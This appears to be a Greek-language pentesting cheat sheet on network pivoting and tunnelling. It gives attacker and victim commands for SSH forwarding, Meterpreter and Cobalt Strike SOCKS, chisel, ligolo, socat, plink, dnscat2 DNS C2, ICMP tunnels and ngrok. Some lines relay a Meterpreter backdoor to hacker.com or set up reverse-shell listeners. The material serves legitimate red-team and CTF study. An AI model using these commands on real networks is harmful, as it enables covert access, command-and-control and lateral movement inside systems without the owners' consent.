ICMP και SYN σάρωσεις δεν μπορούν να περάσουν μέσω socks proxies, οπότε πρέπει να απενεργοποιήσουμε την ανακάλυψη ping (-Pn) και να καθορίσουμε TCP σάρωσεις (-sT) για να λειτουργήσει αυτό.
Bash
Host -> Jump -> InternalA -> InternalB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
SSH γραφική σύνδεση (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Local Port2Port
Άνοιγμα νέας Θύρας στον SSH Server --> Άλλη θύρα
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
ssh-issh_key<user>@<ip_compromised>-L<attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
ssh-f-N-D<attacker_port><username>@<ip_compromised>#All sent to local port will exit through the compromised server (use as proxy)
Αντίστροφη Προώθηση Θυρών
Αυτό είναι χρήσιμο για να αποκτήσετε αντίστροφες θήκες από εσωτερικούς υπολογιστές μέσω μιας DMZ στον υπολογιστή σας:
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Tunnel
Χρειάζεστε root και στις δύο συσκευές (καθώς πρόκειται να δημιουργήσετε νέες διεπαφές) και η ρύθμιση του sshd πρέπει να επιτρέπει την είσοδο ως root:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Ενεργοποιήστε την προώθηση στην πλευρά του διακομιστή
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Ένας άλλος τρόπος:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
SOCKS proxy
Ανοίξτε μια θύρα στον server της ομάδας που ακούει σε όλα τα interfaces που μπορούν να χρησιμοποιηθούν για να δρομολογήσουν την κίνηση μέσω του beacon.
beacon> socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
Σε αυτή την περίπτωση, το θύρα ανοίγει στον host beacon, όχι στον Team Server και η κίνηση αποστέλλεται στον Team Server και από εκεί στον καθορισμένο host:port
Η αντίστροφη προώθηση θύρας του Beacon έχει σχεδιαστεί για να συνδέει την κίνηση στον διακομιστή ομάδας, όχι για αναμετάδοση μεταξύ μεμονωμένων μηχανών.
Η κίνηση είναι συνδεδεμένη μέσα στην κίνηση C2 του Beacon, συμπεριλαμβανομένων των P2P συνδέσεων.
Δικαιώματα διαχειριστή δεν απαιτούνται για τη δημιουργία αντίστροφων προωθήσεων θύρας σε υψηλές θύρες.
rPort2Port local
Σε αυτή την περίπτωση, η θύρα ανοίγεται στον οικοδεσπότη beacon, όχι στον διακομιστή ομάδας και η κίνηση αποστέλλεται στον πελάτη Cobalt Strike (όχι στον διακομιστή ομάδας) και από εκεί στον καθορισμένο οικοδεσπότη:θύρα
Μπορείτε να το κατεβάσετε από τη σελίδα εκδόσεων του https://github.com/jpillora/chisel
Πρέπει να χρησιμοποιήσετε την ίδια έκδοση για πελάτη και διακομιστή
socks
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
Χρησιμοποιήστε την ίδια έκδοση για τον πράκτορα και τον μεσολαβητή
Tunneling
# Start proxy server and automatically generate self-signed TLS certificates -- Attackersudo./proxy-selfcert# Create an interface named "ligolo" -- Attackerinterface_create--name"ligolo"# Print the currently used certificate fingerprint -- Attackercertificate_fingerprint# Start the agent with certification validation -- Victim./agent-connect<ip_proxy>:11601-v-accept-fingerprint<fingerprint># Select the agent -- Attackersession1# Start the tunnel on the proxy server -- Attackertunnel_start--tun"ligolo"# Display the agent's network configuration -- Attackerifconfig# Create a route to the agent's specified network -- Attackerinterface_add_route--name"ligolo"--route<network_address_agent>/<netmask_agent># Display the tun interfaces -- Attackerinterface_list
Σύνδεση και Ακρόαση
# Establish a tunnel from the proxy server to the agent# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attackerlistener_add--addr0.0.0.0:30000--to127.0.0.1:10000--tcp# Display the currently running listeners on the agent -- Attackerlistener_list
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker> socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exeTCP-LISTEN:2222OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5#Execute the meterpreter
Μπορείτε να παρακάμψετε έναν μη αυθεντικοποιημένο διακομιστή μεσολάβησης εκτελώντας αυτή τη γραμμή αντί για την τελευταία στην κονσόλα του θύματος:
Δημιουργήστε πιστοποιητικά και στις δύο πλευρές: Πελάτης και Διακομιστής
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Συνδέστε την τοπική θύρα SSH (22) με την θύρα 443 του επιτιθέμενου.
attacker> sudosocatTCP4-LISTEN:443,reuseaddr,forkTCP4-LISTEN:2222,reuseaddr#Redirect port 2222 to port 443 in localhostvictim> whiletrue; dosocatTCP4:<attacker>:443TCP4:127.0.0.1:22 ; done# Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22attacker> sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
Είναι σαν μια κονσόλα PuTTY έκδοση (οι επιλογές είναι πολύ παρόμοιες με έναν ssh πελάτη).
Καθώς αυτό το δυαδικό αρχείο θα εκτελείται στο θύμα και είναι ένας ssh πελάτης, πρέπει να ανοίξουμε την υπηρεσία ssh και την θύρα μας ώστε να μπορέσουμε να έχουμε μια αντίστροφη σύνδεση. Στη συνέχεια, για να προωθήσουμε μόνο την τοπικά προσβάσιμη θύρα σε μια θύρα στη μηχανή μας:
echoy|plink.exe-l<Our_valid_username>-pw<valid_password> [-p <port>]-R<port_in_our_host>:<next_ip>:<final_port><your_ip>echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
Πρέπει να είστε τοπικός διαχειριστής (για οποιαδήποτε θύρα)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
Πρέπει να έχετε RDP πρόσβαση στο σύστημα.
Κατεβάστε:
SocksOverRDP x64 Binaries - Αυτό το εργαλείο χρησιμοποιεί Dynamic Virtual Channels (DVC) από τη δυνατότητα Remote Desktop Service των Windows. Το DVC είναι υπεύθυνο για tunneling πακέτων μέσω της σύνδεσης RDP.
Στον υπολογιστή-πελάτη σας φορτώστε SocksOverRDP-Plugin.dll όπως αυτό:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64> regsvr32.exeSocksOverRDP-Plugin.dll
Τώρα μπορούμε να συνδεθούμε με το θύμα μέσω RDP χρησιμοποιώντας mstsc.exe, και θα πρέπει να λάβουμε μια προτροπή που λέει ότι το SocksOverRDP plugin είναι ενεργοποιημένο, και θα ακούει στη διεύθυνση 127.0.0.1:1080.
Συνδεθείτε μέσω RDP και ανεβάστε & εκτελέστε στο μηχάνημα του θύματος το δυαδικό αρχείο SocksOverRDP-Server.exe:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Τώρα, επιβεβαιώστε στη μηχανή σας (επιτιθέμενος) ότι η θύρα 1080 ακούει:
netstat -antb | findstr 1080
Τώρα μπορείτε να χρησιμοποιήσετε Proxifierγια να προξενήσετε την κίνηση μέσω αυτού του θύρας.
Προξενήστε εφαρμογές Windows GUI
Μπορείτε να κάνετε τις εφαρμογές Windows GUI να περιηγούνται μέσω ενός proxy χρησιμοποιώντας Proxifier.
Στο Profile -> Proxy Servers προσθέστε τη διεύθυνση IP και τη θύρα του διακομιστή SOCKS.
Στο Profile -> Proxification Rules προσθέστε το όνομα του προγράμματος που θέλετε να προξενήσετε και τις συνδέσεις προς τις διευθύνσεις IP που θέλετε να προξενήσετε.
Παράκαμψη proxy NTLM
Το προηγουμένως αναφερόμενο εργαλείο: RpivotOpenVPN μπορεί επίσης να το παρακάμψει, ρυθμίζοντας αυτές τις επιλογές στο αρχείο ρύθμισης.
Αυτή η εφαρμογή αυθεντικοποιείται έναντι ενός proxy και δεσμεύει μια θύρα τοπικά που προωθείται στην εξωτερική υπηρεσία που καθορίζετε. Στη συνέχεια, μπορείτε να χρησιμοποιήσετε το εργαλείο της επιλογής σας μέσω αυτής της θύρας.
Για παράδειγμα, προωθήστε τη θύρα 443
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Τώρα, αν ρυθμίσετε για παράδειγμα στον θύμα την υπηρεσία SSH να ακούει στην πόρτα 443. Μπορείτε να συνδεθείτε σε αυτήν μέσω της θύρας του επιτιθέμενου 2222.
Μπορείτε επίσης να χρησιμοποιήσετε ένα meterpreter που συνδέεται στο localhost:443 και ο επιτιθέμενος ακούει στην πόρτα 2222.
Δημιουργεί ένα κανάλι C&C μέσω DNS. Δεν απαιτεί δικαιώματα root.
attacker> ruby./dnscat2.rbtunneldomain.comvictim> ./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker> rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim> ./dnscat2--dnshost=10.10.10.10,port=5353
Στο PowerShell
Μπορείτε να χρησιμοποιήσετε dnscat2-powershell για να εκτελέσετε έναν πελάτη dnscat2 στο powershell:
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Αλλαγή DNS του proxychains
Το Proxychains παρεμβαίνει στην κλήση gethostbyname της libc και στέλνει τα αιτήματα DNS tcp μέσω του socks proxy. Από προεπιλογή, ο DNS διακομιστής που χρησιμοποιεί το proxychains είναι 4.2.2.2 (σκληρά κωδικοποιημένος). Για να τον αλλάξετε, επεξεργαστείτε το αρχείο: /usr/lib/proxychains3/proxyresolv και αλλάξτε τη διεύθυνση IP. Αν βρίσκεστε σε περιβάλλον Windows, μπορείτε να ορίσετε τη διεύθυνση IP του domain controller.
Απαιτείται root και στα δύο συστήματα για να δημιουργηθούν οι προσαρμογείς tun και να μεταφερθούν δεδομένα μεταξύ τους χρησιμοποιώντας αιτήματα ICMP echo.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrokείναι ένα εργαλείο για να εκθέτει λύσεις στο Διαδίκτυο με μία γραμμή εντολής.
&#xNAN;Exposition URI είναι όπως:UID.ngrok.io
Εγκατάσταση
Δημιουργήστε έναν λογαριασμό: https://ngrok.com/signup
Λήψη πελάτη:
tarxvzf~/Downloads/ngrok-v3-stable-linux-amd64.tgz-C/usr/local/binchmoda+x./ngrok# Init configuration, with your token./ngrokconfigedit
Είναι επίσης δυνατή η προσθήκη αυθεντικοποίησης και TLS, αν είναι απαραίτητο.
Τούνελινγκ TCP
# Pointing to 0.0.0.0:4444./ngroktcp4444# Example of resulting link: 0.tcp.ngrok.io:12345# Listen (example): nc -nvlp 4444# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
Έκθεση αρχείων με HTTP
./ngrokhttpfile:///tmp/httpbin/# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
Sniffing HTTP calls
Χρήσιμο για XSS, SSRF, SSTI ...
Απευθείας από το stdout ή στη διεπαφή HTTP http://127.0.0.1:4040.
Tunneling internal HTTP service
./ngrokhttplocalhost:8080--host-header=rewrite# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/# With basic auth./ngrokhttplocalhost:8080--host-header=rewrite--auth="myuser:mysuperpassword"
ngrok.yaml απλή διαμόρφωση παράδειγμα
Ανοίγει 3 τούνελ:
2 TCP
1 HTTP με στατική έκθεση αρχείων από /tmp/httpbin/